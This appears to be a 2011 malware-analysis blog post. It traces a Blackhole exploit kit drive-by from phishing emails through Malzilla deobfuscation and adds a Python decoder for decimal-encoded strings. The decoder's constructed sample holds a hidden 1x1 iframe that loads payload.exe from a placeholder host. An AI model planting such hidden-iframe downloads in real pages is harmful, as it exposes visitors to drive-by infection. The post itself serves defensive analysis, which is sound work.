Wednesday, December 21, 2011

Blackhole Toolkit drive-by download reversed

So, I've been seeing those "Transaction system failure" emails. Included in the email is this great tidbit:

<h1>WAIT PLEASE</h1>
<script language="JavaScript" type="text/JavaScript" src="hxxp://"></script>
<script language="JavaScript" type="text/JavaScript" src="hxxp://"></script>
<script language="JavaScript" type="text/JavaScript" src="hxxp://"></script>

So let's wget one of these and see what we have:


Let's wget THAT and see what we have:

Yugh...obfuscated JavaScript...ick.  So let's fire up Malzilla and see what we can do.  I copied the above into the Decoder tab and hit Debug.  I get an error:
aa is not defined

Well that stinks.  But I DO get some good info from the Variable State window, so let's change the easy ones:


Still the same "aa is not defined" error after running Debug again, so let's nuke that if portion to show:

Now we're hot doggin!  Closing the Debug window will give us:

So let's see what's in that eval_temp file: open the temp file in Notepad/WordPad, copy ALL of it, create a new Decoder tab in Malzilla, dump it in, and click Format Code:

Note the rabbit link.  Now...there's a LOT of crap going on here...PDF/Java/Flash version checks, to name a few.  But what caught my eye was down at the bottom area:

Let's copy all those comma-separated numbers, go to the Misc Decoders tab, and paste 'em in.  Don't forget to add a comma at the very start of the string.  Click the Decode Dec(,) button:
Hey hey!  Look at that.  Let's wget THAT link and see what we get:
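The Decode Dec(,) step above is just "split on commas, turn each decimal into its character".  Here is the same thing as a small script, added for this post and not part of Malzilla or the exploit kit, so you can run it over a saved copy of a script without the GUI.  It also goes one step further than the button: it scans a whole script for long decimal runs, decodes each one, and pulls out any URLs it finds, which is what you actually want when triaging a pile of these.  The sample script, the iframe text and the host example.invalid are all constructed placeholders, not the ones from this sample.

```python
"""Decode comma-separated decimal character codes the way Malzilla's
"Decode Dec(,)" button does, and pull any URLs out of the result.

Added example for this post; not Malzilla's code. All sample data below is
constructed here, and example.invalid is a placeholder, not a real host.
"""
import re
from typing import List, Tuple

# A "long" run is at least 8 decimal numbers separated by commas (whitespace
# tolerated), so short version strings like "9,4,0" are not decoded.
DEC_RUN = re.compile(r"(?:\d{1,3}\s*,\s*){7,}\d{1,3}")

# Good enough to spot http(s) URLs in decoded text; stops at quotes/brackets.
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def decode_dec_csv(run: str) -> str:
    """Turn ',104,116,116,112' (leading comma optional) into 'http'."""
    codes = [int(tok) for tok in run.split(",") if tok.strip()]
    if any(not 0 <= c <= 0x10FFFF for c in codes):
        raise ValueError("character code out of range")
    return "".join(chr(c) for c in codes)


def encode_dec_csv(text: str, leading_comma: bool = True) -> str:
    """Inverse of decode_dec_csv; used here only to build the constructed sample."""
    body = ",".join(str(ord(ch)) for ch in text)
    return ("," + body) if leading_comma else body


def find_decoded_runs(script: str) -> List[Tuple[str, str]]:
    """Return (raw_run, decoded_text) for each long decimal run in script."""
    return [(m.group(0), decode_dec_csv(m.group(0))) for m in DEC_RUN.finditer(script)]


def extract_urls(script: str) -> List[str]:
    """URLs hidden inside decimal-encoded runs, in order of appearance."""
    urls: List[str] = []
    for _, decoded in find_decoded_runs(script):
        urls.extend(URL_RE.findall(decoded))
    return urls


# Constructed sample: a placeholder iframe encoded the same way, plus a short
# version string that must NOT be treated as encoded text.
PLACEHOLDER = '<iframe src="http://example.invalid/payload.exe" width="1" height="1"></iframe>'
SAMPLE_SCRIPT = (
    'var ver = "9,4,0";\n'
    'var z = "' + encode_dec_csv(PLACEHOLDER, leading_comma=False) + '";\n'
    'document.write(String.fromCharCode.apply(null, z.split(",")));\n'
)

if __name__ == "__main__":
    for raw, decoded in find_decoded_runs(SAMPLE_SCRIPT):
        print(f"{raw[:40]}... -> {decoded}")
    print("URLs:", extract_urls(SAMPLE_SCRIPT))
```

Run it as-is to see the constructed sample decoded, or read a saved eval_temp file into `find_decoded_runs` instead of `SAMPLE_SCRIPT`.  The minimum run length is the only tuning knob; drop it if a sample hides a short string, raise it if version numbers start showing up as garbage.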


ViCheck and VirusTotal don't show much...scary:
